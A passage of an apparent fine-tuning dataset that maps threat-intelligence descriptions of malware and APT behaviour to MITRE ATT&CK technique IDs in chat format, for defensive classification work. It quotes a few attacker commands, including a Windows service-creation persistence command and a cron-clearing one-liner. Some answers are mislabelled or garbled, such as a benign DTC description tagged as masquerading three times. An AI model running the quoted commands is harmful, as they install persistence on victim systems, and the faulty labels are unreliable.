Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To establish persistence, SslMM identifies the Start Menu Startup directory and drops a link to its own executable disguised as an “Office Start,” “Yahoo Talk,” “MSN Gaming Z0ne,” or “MSN Talk” shortcut." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "On June 21st, 2017 an attacker breached one of our monitored systems by brute-forcing SSH credentials using two IPs known to be part of the TOR network" }, { "role": "assistant", "content": "T1110 - Brute Force" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has obtained and used a variety of tools including Mimikatz, SDelete, Tor, meek, and Cobalt Strike." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has used VBA and embedded macros in Word documents to execute malicious code." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Aria-body has the ability to decrypt the loader configuration and payload DLL." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Several Lazarus Group malware families use timestomping, including modifying the last write timestamp of a specified Registry key to a random date, as well as copying the timestamp for legitimate .exe files (such as calc.exe or mspaint.exe) to its dropped files." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TYPEFRAME can upload and download files to the victim’s machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "esentutl can be used to collect data from local file systems." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ASPXTool — A modified version of the ASPXSpy web shell (see Figure 6)" }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "macOS.OSAMiner can parse the output of the native `system_profiler` tool to determine if the machine is running with 4 cores." }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GreyEnergy can download additional modules and payloads." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 created a Scheduled Task/Job that used regsvr32.exe to execute a COM scriptlet that dynamically downloaded a backdoor and injected it into memory. The group has also used regsvr32 to run their backdoor." }, { "role": "assistant", "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In the case of Astaroth trojan, the .lnk file contains an argument into WMIC.exe to run in non-interactive mode, which forgoes opening a window that the victim could notice, to download the hardcoded url in the .lnk" }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clambling can store a file named `mpsvc.dll`, which opens a malicious `mpsvc.mui` file, in the same folder as the legitimate Microsoft executable `MsMpEng.exe` to gain execution." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Earth Lusca created a service using the command \"sc create “SysUpdate” binpath= “cmd /c start “[file path]””&&sc config “SysUpdate” start= auto&&net\nstart SysUpdate\" for persistence." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has restored malicious KernelCallbackTable code to its original state after the process execution flow has been hijacked." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DDKONG uses Rundll32 to ensure only a single instance of itself is running at once." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has distributed targeted emails containing Word documents with embedded malicious macros." }, { "role": "assistant", "content": "T1598.002 - Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HotCroissant has the ability to determine if the current user is an administrator, Windows product name, processor name, screen resolution, and physical RAM of the infected host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hildegard has decrypted ELF files with AES." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used Windows DDE for execution of commands and a malicious VBS." }, { "role": "assistant", "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Distributed Transaction Coordinator (DTC) service coordinates transactions that update two or more transaction-protected resources, such as databases, message queues, files systems, and so on. These transaction-protected resources may be on a single computer or distributed across many networked computers" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RunningRAT contains code to clear event logs." }, { "role": "assistant", "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A gh0st RAT variant has used DLL side-loading." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ObliqueRAT can copy specific files, webcam captures, and screenshots to local directories." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "!ProcessList List running processes, including their PID, parent PID, executable name and priority !SendFileToServer Uploads a specified file to the C2 server !CaptureScreen Takes a screenshot that it saves to a file and uploads to the C2 server" }, { "role": "assistant", "content": "T1057 - Process Discovery', 'T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Character Digit h 0 i 1 j 2 k 3 l 4 m 5 n 6 o 7 p 8 q 9 Table 4 Character substitution used in RogueRobin The Trojan will use future DNS requests to retrieve jobs from the C2 server, which the Trojan will handle as commands" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerShower, named and previously disclosed by Palo Alto Networks in their blogspot (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage. The differences in the two versions reside mostly in anti-forensics features for the validator version of PowerShower" }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Operation Wocao has used scheduled tasks to execute malicious PowerShell code on remote systems." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As described in the analysis of the group’s previous macOS backdoor, a clientID is created. This identifier is the MD5 hash of the return value of one of the following commands" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BlackMatter leverages legitimate remote monitoring and management software and remote desktop software, often by setting up trial accounts, to maintain persistence on victim networks." }, { "role": "assistant", "content": "T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Silence has used compromised credentials to log on to other systems and escalate privileges." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "installed its payload in the startup programs folder as \"Baidu Software Update.\" The group also adds its second stage payload to the startup programs as “Net Monitor.\"" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EvilBunny has used EnumProcesses() to identify how many process are running in the environment." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Grandoreiro can detect VMWare via its I/O port and Virtual PC via the \"vpcext\" instruction." }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkWatchman can search for anti-virus products on the system." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "allows adversaries to execute shell commands on the infected host." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Siloscape searches for the kubectl binary." }, { "role": "assistant", "content": "T1518 - Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Downloaded payload is a variant of a cloud-based RAT known as RokRat which has been used by this group since 2017. This RAT is known to steal data from a victim’s machine and send them to cloud services (Pcloud, Dropbox, Box, Yandex" }, { "role": "assistant", "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZxxZ has created a snapshot of running processes using `CreateToolhelp32Snapshot`." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group delivered RATANKBA and other malicious code to victims via a compromised legitimate website." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clambling has the ability to bypass UAC using a `passuac.dll` file." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can take screenshots." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoisonIvy contains a keylogger." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DustySky extracts basic information about the operating system." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Suckfly used legitimate account credentials that they dumped to navigate the internal victim network as though they were the legitimate account owner." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ThiefQuest searches through the \"/Users/\" folder looking for executable files. For each executable, ThiefQuest prepends a copy of itself to the beginning of the file. When the file is executed, the ThiefQuest code is executed first. ThiefQuest creates a hidden file, copies the original target executable to the file, then executes the new hidden file to maintain the appearance of normal behavior." }, { "role": "assistant", "content": "T1554 - Compromise Host Software Binary" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Javali can use DLL side-loading to load malicious DLLs into legitimate executables." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of creating a reverse shell." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Threat Group-3390 actors have used gsecdump to dump credentials. They have also dumped credentials from domain controllers." }, { "role": "assistant", "content": "T1003.002 - OS Credential Dumping: Security Account Manager', 'T1003.004 - OS Credential Dumping: LSA Secrets" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wizard Spider has used taskkill.exe and net.exe to stop backup, catalog, cloud, and other services prior to network encryption." }, { "role": "assistant", "content": "T1489 - Service Stop" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Wocao, threat actors scanned for open ports and used nbtscan to find NETBIOS nameservers." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN8 has used scheduled tasks to maintain RDP backdoors." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Operation Wocao can proxy traffic through multiple infected systems." }, { "role": "assistant", "content": "T1090.001 - Proxy: Internal Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 1 – The wrapper DLL poses as a legitimate mpr.dll library, both by its name and version info" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SDBbot can collected the country code of a compromised machine." }, { "role": "assistant", "content": "T1614 - System Location Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InvisiMole has used a custom implementation of DNS tunneling to embed C2 communications in DNS requests and replies." }, { "role": "assistant", "content": "T1071.004 - Application Layer Protocol: DNS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIVEHANDS can enumerate network shares and mounted drives on a network." }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If elevated privileges are not obtained, the malware falls back to using the same Windows registry run key as the older mode variant for persistence HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run. For each service, the malware attempts to take control of the service’s executable — first using icacls.exe with the /reset flag to reset the executable’s permissions, then using takeown.exe with the /F flag to take ownership of the executable" }, { "role": "assistant", "content": "T1222.001 - File and Directory Permissions Modification: Windows File and Directory Permissions Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SpicyOmelette has the ability to execute arbitrary JavaScript code on a compromised host." }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HOPLIGHT has modified Managed Object Format (MOF) files within the Registry to run specific commands and create persistence on the system." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A Golden Ticket (GT) can be created to impersonate any user (real or imagined) in the domain as a member of any group in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain. Since the Golden Ticket is an authentication ticket (TGT described below), its scope is the entire domain (and the AD forest by leveraging SID History) since the TGT is used to get service tickets (TGS) used to access resources. The Golden Ticket (TGT) contains user group membership information (PAC) and is signed and encrypted using the domain’s Kerberos service account (KRBTGT) which can only be opened and read by the KRBTGT account" }, { "role": "assistant", "content": "T1134.005 - Access Token Manipulation: SID-History Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PlugX has a module to download and execute files on the compromised machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "automatically searches for files on local drives based on a predefined list of file extensions and sends them to the command and control server every 60 minutes. also automatically sends keylogger files and screenshots to the C2 server on a regular timeframe." }, { "role": "assistant", "content": "T1020 - Automated Exfiltration" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "5) Downloads the ‘kinsing’ malware and runs it 6) Uses crontab to download and run the shell script every minute 7) Looks for other commands running in cron, and if ones were identified, deletes all cron jobs, including its own. We are not certain why the attackers chose to do so, but that is what the script executes:crontab -l || sed '/update.sh/d' || crontab" }, { "role": "assistant", "content": "T1059.004 - Command and Scripting Interpreter: Bash', 'T1053.003 - Scheduled Task/Job: Cron" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group malware WhiskeyDelta-Two contains a function that attempts to rename the administrator’s account." }, { "role": "assistant", "content": "T1098 - Account Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InvisiMole can inject itself into another process to avoid detection including use of a technique called ListPlanting that customizes the sorting algorithm in a ListView structure." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once it is encrypted using the XOR algorithm, the buffer is encoded with BASE64" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can collect data from a local system." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RegDuke can use control-flow flattening or the commercially available .NET Reactor for obfuscation." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ryuk has attempted to adjust its token privileges to have the \"SeDebugPrivilege\"." }, { "role": "assistant", "content": "T1134 - Access Token Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After decoding their C2 server IP addresses, from obfuscated strings, both trojans will attempt to collect host information and send it to the C2 server." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses various WMI queries to check if the sample is running in a sandbox." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Anchor can determine the hostname and linux version on a compromised host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Try to exploit the following Remote Code Execution vulnerabilities in the targeted servers: a) CVE-2012-0874: JBoss Enterprise Application Platform Multiple Security Bypass Vulnerabilities b) CVE-2010-1871: JBoss Seam Framework remote code execution c) JBoss AS 3/4/5/6: Remote Command Execution (exploit) d) CVE-2017-10271: Oracle WebLogic wls-wsat Component Deserialization RCE e) CVE-2018-2894: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware" }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BITTER has exploited Microsoft Office vulnerabilities CVE-2012-0158, CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "beacons to destination port 443." }, { "role": "assistant", "content": "T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some samples use cmd.exe to delete temporary files." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains the readFiles function to return a detailed listing (sometimes recursive) of a specified directory." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT33 has obtained and leveraged publicly-available tools for early intrusion activities." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "menuPass has staged data on remote MSP systems or other victim networks prior to exfiltration." }, { "role": "assistant", "content": "T1074.002 - Remote Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ServHelper will attempt to enumerate Windows version and system architecture." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Downdelph uses search order hijacking of the Windows executable sysprep.exe to escalate privileges." }, { "role": "assistant", "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team's VBS backdoor can decode Base64-encoded data and save it to the %TEMP% folder. The group also decrypted received information using the Triple DES algorithm and decompresses it using GZip." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses search order hijacking of the Windows executable sysprep.exe to escalate privileges." }, { "role": "assistant", "content": "T1574.001 - Hijack Execution Flow: DLL 